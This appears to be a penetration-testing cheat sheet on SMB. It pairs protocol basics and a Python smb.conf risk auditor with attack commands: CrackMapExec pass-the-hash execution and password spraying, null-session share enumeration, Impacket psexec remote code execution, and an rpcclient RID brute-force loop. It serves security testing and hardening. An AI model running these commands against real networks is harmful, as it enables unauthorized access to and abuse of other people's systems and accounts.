SMB Security & Exploitation Guide
1. About SMB
Server Message Block (SMB) is a client-server protocol that provides shared access to:
Files and directories
Printers
Routers and interfaces
It enables communication between nodes in the same network, granting access to resources based on authentication and permissions.
Default Ports:
NetBIOS over TCP: 137, 138, 139
Direct SMB (CIFS): 445
2. Tools for SMB Interaction
CrackMapExec (CME)
A powerful tool for SMB enumeration and exploitation.
Pass-the-Hash or Command Execution:
crackmapexec smb 192.0.2.10 -u Administrator -d . -H <NTLM_HASH> -x whoami
Null-session login and share enumeration:
crackmapexec smb 203.0.113.5 -u '' -p '' --shares
Userlist checking:
crackmapexec smb 198.51.100.20 -u users.txt -p '' -d . --continue-on-success
User=Password spray attack:
crackmapexec smb 198.51.100.20 -u users.txt -d . --no-bruteforce --continue-on-success
Samba
An open-source implementation of SMB/CIFS on Unix-based systems.
Configuration file:
/etc/samba/smb.conf
Check active connections:
smbstatus
Inspect config (excluding comments):
grep -v '[#;]' /etc/samba/smb.conf
smbclient
A command-line tool to interact with SMB shares.
List available shares (null session):
smbclient -N -L //192.0.2.10
Connect to a share:
smbclient -U username \\\\192.0.2.10\\share
Useful commands:
help → show available commands
ls → list files
get <file> → download a file
!<cmd> → run local system command
SMBMap
Automation tool for SMB enumeration and file operations.
Basic enum:
smbmap -H 192.0.2.10
Recursive enum:
smbmap -H 192.0.2.10 -r share
Download a file:
smbmap -H 192.0.2.10 --download "share/example.txt"
Upload a file:
smbmap -H 192.0.2.10 --upload example.txt "share/example.txt"
Impacket Tools
Impacket provides Python scripts for SMB interaction and exploitation.
SMB client:
impacket-smbclient 'rio@corp.local' -no-pass
Run SMB server:
sudo impacket-smbserver share ./ -smb2support
Remote code execution:
impacket-psexec administrator:'mypass@123'@192.0.2.10
(The same syntax applies to smbexec and atexec.)
RPCclient
RPC (Remote Procedure Call) allows process-to-process communication across systems.
Connect (null session):
rpcclient -U "" 192.0.2.10
Invoke commands:
rpcclient $> enumdomusers
rpcclient $> queryuser <RID>
RID Brute Force (users/groups enumeration):
for i in $(seq 500 1100); do
  rpcclient -N -U "" 192.0.2.10 -c "queryuser 0x$(printf '%x\n' $i)" \
    | grep "User Name\|user_rid\|group_rid" && echo ""
done
Alternative: use samrdump.py, enum4linux, or enum4linux-ng:
./enum4linux-ng.py 192.0.2.10 -A
Windows Net Command
net use \\DC01\ipc$ "" /u:""
3. Dangerous SMB Configuration Settings
browseable = yes → Shares are visible in network browsing.
read only = no → Users can create and modify files.
writable = yes → Full write permissions allowed.
guest ok = yes → Anonymous logins permitted.
enable privileges = yes → Honors user privileges (may be abused).
create mask = 0777 → New files created with world read/write permissions.
directory mask = 0777 → New directories created with world read/write permissions.
logon script = script.sh → Executes script at user login.
magic script = script.sh / magic output = script.out → Dangerous auto-execution functionality.
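As an added example (not code from the original guide), a small Python audit that parses an smb.conf and flags the settings listed above; the minimal parser and the SAMPLE config are constructed for this example, and the option names come from the list in this section.

```python
# Added example (not the guide's own code): flag the risky smb.conf settings listed above.
import re
BOOL = {"yes": "yes", "true": "yes", "1": "yes", "no": "no", "false": "no", "0": "no"}
# option -> dangerous value (None = dangerous whenever the option is set at all)
RISKY = {"browseable": "yes", "read only": "no", "writable": "yes", "writeable": "yes",
         "guest ok": "yes", "enable privileges": "yes", "create mask": "0777",
         "directory mask": "0777", "logon script": None, "magic script": None}
def parse_smb_conf(text):
    """Return {section: {option: value}}; lines starting with '#' or ';' are comments."""
    conf, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            section = m.group(1).strip().lower()
            conf.setdefault(section, {})
        elif section is not None and "=" in line:
            key, _, value = line.partition("=")
            conf[section][key.strip().lower()] = value.strip()
    return conf

def is_risky(value, bad):
    """Compare against the dangerous value, normalising yes/true/1 and octal masks."""
    if bad is None:
        return True
    if bad in ("yes", "no"):
        return BOOL.get(value.lower()) == bad
    try:
        return int(value, 8) == int(bad, 8)  # 777 and 0777 are the same mask
    except ValueError:
        return False

def audit(text):
    """Return [(section, option, value)] for every risky setting in the config."""
    return [(sec, opt, val) for sec, opts in parse_smb_conf(text).items()
            for opt, val in opts.items() if opt in RISKY and is_risky(val, RISKY[opt])]
SAMPLE = """# constructed smb.conf for this example
[global]
   enable privileges = yes
[public]
   guest ok = True
   read only = no
   create mask = 777
[secure]
   read only = yes
   ; writable = yes
"""
```

Running `audit(SAMPLE)` reports the three risky options in `[public]` and the global `enable privileges`, while the commented-out `writable` line and `read only = yes` in `[secure]` are correctly ignored.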
4. Creating a Share (Windows 10 Example)
Create a folder.
Use Advanced Sharing to share the folder.
Configure both SMB share permissions and NTFS permissions.
SMB permissions control network access.
NTFS permissions control file system access.
Inherited permissions are marked grey (from parent directory).
5. Mounting SMB Shares (Linux)
sudo mount -t cifs -o username=rio,password=rio@123 //192.0.2.10/Sharename /home/user/Desktop/